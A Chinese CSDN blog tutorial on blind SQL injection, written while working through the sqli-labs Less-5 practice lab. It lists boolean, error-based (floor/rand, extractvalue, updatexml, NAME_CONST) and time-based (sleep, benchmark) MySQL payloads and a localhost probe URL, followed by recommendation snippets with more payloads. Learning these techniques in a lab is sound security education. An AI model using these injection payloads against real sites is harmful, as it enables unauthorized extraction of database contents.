由sqli-labs/Less-5学习各种基础盲注技巧

最新推荐文章于 2024-02-24 20:58:57 发布
最新推荐文章于 2024-02-24 20:58:57 发布
阅读量612 收藏 8
点赞数 1
分类专栏: sql注入 文章标签: 盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zz_caleb/article/details/86813314
版权
本文作者分享了在学习sqli-labs/Less-5时对基础盲注技巧的总结,主要包括布尔盲注、基于报错的盲注和延时盲注三种方法。文章详细介绍了各种盲注的实施方式,包括使用不同的函数进行payload构造,并给出了实际示例。
摘要由CSDN通过智能技术生成

本文为本人在学习中的总结,仅涉及基础的盲注技巧,可能多有疏漏之处,欢迎指教。

另外本人博客的SQL注入分类下有一些方面的详细讲解,在此只介绍简单的使用。

0x00、介绍一下本人对盲注的总结。

盲注就是在没有回显的结果下进行推断性的注入,这样我们有几种办法来注入:

1、根据页面正常与否判断payload是否正确(基于bool的盲注)

2、想办法让页面产生回显(个人感觉这个比较好用)(基于报错的盲注)

3、利用页面的延迟反应判断payload是否正确(基于延时的盲注)

0x01、盲注的大纲

1、布尔盲注

也就是上面说的根据页面是否正常来进行判断和注入。

1)字符串截取函数进行注入

了解一下会经常用到的MySQL字符串截取函数。

原理及简单应用参考:https://blog.csdn.net/zz_Caleb/article/details/86814043

2)regexp正则注入

原理及简单应用参考:https://blog.csdn.net/zz_Caleb/article/details/86814922

3)like匹配注入

例如:select user() like ‘ro%’

通配符 描述
% 替代一个或多个字符
_ 仅替代一个字符

这三部分为bool盲注主要方法。

2、基于报错的盲注

想办法让页面产生回显

1)经典语句注入

select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a

select user()处就是语句作用的地方,将其换成我们简单注入是用的语句来获取回显内容。

以上语句可以简化成如下的形式。
select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))

注:若order by结果为三栏,select处应为select 1,2,count(*)

这里version()是语句作用点

2)exp()注入:利用double 数值类型溢出

原理参考:https://blog.csdn.net/zz_Caleb/article/details/86807364

3)bigint 溢出注入

原理参考:https://blog.csdn.net/zz_Caleb/article/details/86808589

4)extractvalue注入

用法:extractvalue(1,concat(0x7e,(select @@version),0x7e))

//mysql 对 xml 数据进行查询和修改的 xpath 函数,xpath 语法错误

5)updatexml注入

用法:updatexml(1,concat(0x7e,(select @@version),0x7e),1)

//mysql对xml数据进行查询和修改的 xpath 函数,xpath 语法错误

6)利用数据的重复性

用法:select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;

//mysql 重复特性,此处重复了 version,所以报错

3、基于时间的盲注——延时注入

1)if+sleep()

一般用法:If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 //if 判断语句,条件为假,执行 sleep

Ps: 遇到以下这种利用 sleep()延时注入语句
select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.'));
该语句意思是在 0-9 之间找版本号的第一位。但是在我们实际渗透过程中,这种用法是不可取的,因为时间会有网速等其他因素的影响,所以会影响结果的判断。

2)if+benchmark()

UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘MSG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1;
//BENCHMARK(count,expr)用于测试函数的性能,参数一为次数,二为要执行的表达式。可以让函数执行若干次,返回结果比平时要长,通过时间长短的变化,判断语句是否执行成功。这是一种边信道攻击,在运行过程中占用大量的 cpu 资源。推荐使用sleep()函数进行注入。

小准备:

在讲解之前首先公布我们要找的东西吧,这样好有个对照。

根据基础的判断,id=1'--+返回正常。

order by:3个字段(username和password分别在第二三个字段)

database:security

group_concat(table_name separator '@'):emails@referers@uagents@users  (我们用到users)

group_concat(column_name separator '@'):user_id@first_name@last_name@user@password@avatar@last_login@failed_login@id@username@password  (我们用的是username和password)

提一下id=1'--+的判断吧:

id=1 and 1=2--+如果语句正常,则应返回一个错误页面,于是在id=1后面加符号进行判断,当id=1' and 1=2--+是页面错误。

0x02、进行bool盲注

主要是用substr()和mid(),个人认为这两个函数写脚本好些点。

首先暴库长:length()

http://127.0.0.1/sqli-labs/Less-5/?id=1%27%20and%20length(database())=8--+

此时页面正常,所以库长为8。次处用的=判断长度,用二分法判断时用大于小于号,效率更高。

注:本次脚本没写一个二分的,刚开始就想写点简单暴力的,尽量顺利点。

最低0.47元/天 解锁文章
大千SS
关注
专栏目录
sqli-labs Less-5~6(sqli-labs闯关指南 5—6)--盲注
m0_54899775的博客
12-15 1202
sqli-labs Less-5~6(sqli-labs闯关指南 5—6)--盲注 sqli-labs Less 5 sqli-labs Less 6
sqli-labs Less 5盲注准备
qq_35266419的博客
05-12 320
“工欲善其事,必先利其器”,在学完1-4之后,我们又将学习一种新的注入方法,那就是盲注,Less 5将在下一篇文章中讲解。 盲注 1.概念:什么叫盲注?就是当你执行了sql语句后,它在前端页面不返回任何数据,此时,我们需要用一些其他的方法尝试得到它数据库中的内容,这个过程就叫做盲注。 附图: 2.类型:盲注分为几类呢?结合你做过的Less 1-4,你就能从中发现它有三类,分别为: ①基于布尔的S...
Mysql 另类盲注中的一些技巧
weixin_33728268的博客
04-22 79
转:oldjun.com —————————————————————————- 很多技巧从国外的paper学到的,不过国内没有多少人使用,所以发出来,笔记下~ 一、order by 的参数注入技巧: 两种方法,思路都一样。 example. “select username,password from uc_members order by”.$_GET['ode...
Sqli-labs less 5
weixin_34403693的博客
08-11 564
Less-5 这里说一下,有很多的blog是翻译或者copy的,这关正确的思路是盲注。从源代码中可以看到,运行返回结果正确的时候只返回you are in....,不会返回数据库当中的信息了,所以我们不能利用上述less1-4的方法 我们从这这一关开始学习盲注。结合background-2的信息,将上述能使用的payload展示一下使用方法。 利用left(database(),...
基础盲注脚本
m0_57131590的博客
09-23 166
该脚本只是一个单纯的遍历,没有用二分法,简单易懂。 import requests req = requests.Session() url='xxxx' result='' proxies={'http': 'xxx'}//方便调试 header={ "Cookie": "xxxx", "User-Agent": "xxxx", "Content-Type": "xxxx", "Origin": "xxxxx" } def baoshuju(url,proxies):
最详细的讲解 让你最快通关Less-9-Less-10/ --时间盲注http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注
m0_58883317的博客
04-17 5503
http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注 判断注入点 http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) 根据页面显示我们可以知道使用联合注入是不可行的。页面无论对错都只显示you are in所以我们选择和less-9一样
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1853
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
最新发布
m0_73615178的博客
02-24 1413
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs靶场Less-5
songling515010475的专栏
08-20 227
1、访问首页,/Less-5/index.php?id=1,这里的传参点是id 探测五步曲 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 搬出自己准备好的5步曲......好尴尬......慢慢有点难度了哟 结论:通过单引号闭合, 再用and 1=1 与 and 1=2控制条件,发现即不报错又能控制显示的文字。 2、判断字段数量 http://192.168.60.142:8080/sqlilabs/L..
[SQLi-LABS] Less-5
Stan冲冲冲
05-11 217
可以用报错注入,联合查询和双注入 报错: /Less-5/?id=1'--+ /Less-5/?id=1'and extractvalue(1, concat(0x7e, (select version()),0x7e))--+ /Less-5/?id=1'and extractvalue(1, concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'
这是对付sqli-labs less5 的盲注python脚本(不懂,写了好久)
qq_45106794的博客
10-29 817
import requests db_length=1 db_url='' db_place=1 db_name='' db_ascii=1 print("猜解数据库长度") url="http://192.168.56.101/sqli-labs-master/less-5/?id=1'" for db_length in range(1,100): db_url=url+'and %d...
新手上路 盲注的一些基础知识
young‘s blog
08-11 413
时间盲注 通过使用sleep函数 and sleep(参数) 在F12出来的网络选项中观察时间的变化 返回结果为0 if(1,’true’,’false’) 返回结果为true -条件,真返回,假返回 +———————-+ | if(1,’true’,’false’) | +———————-+ | true | +———————-+ mid(选择...
盲注基础进阶
Sea_Sand息禅
05-21 343
sql注入的基础方法参考:https://zzreno.github.io/2019/05/14/由sqli-labsLess-5学习各种基础盲注技巧/(https://blog.csdn.net/zz_Caleb/article/details/86813314) 仍以sqli-labs为例,在基础之上对sql注入进行一些技巧介绍,但是基本的盲注方法还是那几种类型,只不过针对有简单防御性的网站进...
sqli-labs—————Sql注入之盲注讲解
Fly_鹏程万里
05-08 2184
盲注何为盲注盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注盲注分为三类•基于布尔SQL盲注•基于时间的SQL盲注•基于报错的SQL盲注1、基于布尔SQL盲注————构造逻辑判断我们可以利用逻辑判断进行截取字符串相关函数解析  http://blog.csdn.net/Fly_hps/article...
sqli-libs——less 5(盲注
Fly_鹏程万里
05-08 1887
Less-5由于这一关涉及到盲注的内容,所以我们还是想来看看源代码吧:可以看到,如果运行返回结果正确的时候只返回you  are in...,不会返回数据库当中的信息了,所以我们不能之前所采用的在less-4之前的方法了。从这里开始就要进行盲注了!利用left(a,b)进行测试测试数据库版本利用left(database(),1)进行尝试http://192.168.11.136/sqli-lab...
SQL盲注测试高级技巧
weixin_33896069的博客
01-27 218
写在前面: 这篇文章主要写了一些加快盲注速度的技巧盲注中比较精巧的语句,虽然注入并不是什么新技术了。但是数据库注入漏洞依然困扰着每一个安全厂商,也鞭策着每一个安全从业者不断前进。 正文: 首先来简单介绍一下盲注盲注是不能通过直接显示的途径来获取数据库数据的方法。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。一般情况下,盲注可分为三类。 B...
Sqli-labs--less-5
沐目的博客
04-08 4469
sqli-labs-master/Less-5/ 字符型,报错注入 首先 ?id=1’ 报错。让后用双引号,回显正常。再使用单引号+%23,回显正常,基本可以确定是单引号字符型。但是发现使用平常的 union select ,没有任何反应。 所以这道题需要一个新的知识点,刚学sql注入的同学,可能会有一点崩溃。有两种方法,叫做报错注入,其实有三种,但是我只会两种。 一、 报错注入了解一下:(报错...
sqli-labs Less-5和Less-6
giun的博客
01-29 547
Less-5 首先我们观察下源码 观察源码可以看出,如果返回的结果正确就只能返回you are in…,不能得到我们要的数据,所以采用报错注入,这里我们采用floor报错 and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by ...
sqli-labs/Less-28
01-09
sqli-labs是一个用于学习和实践SQL注入的实验平台。Less-28是其中的一个实验,它是基于GET请求的盲注注入漏洞。在这个实验中,我们需要利用字符串单引号和括号来进行注入。 具体步骤如下: 1. 打开sqli-labs实验...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值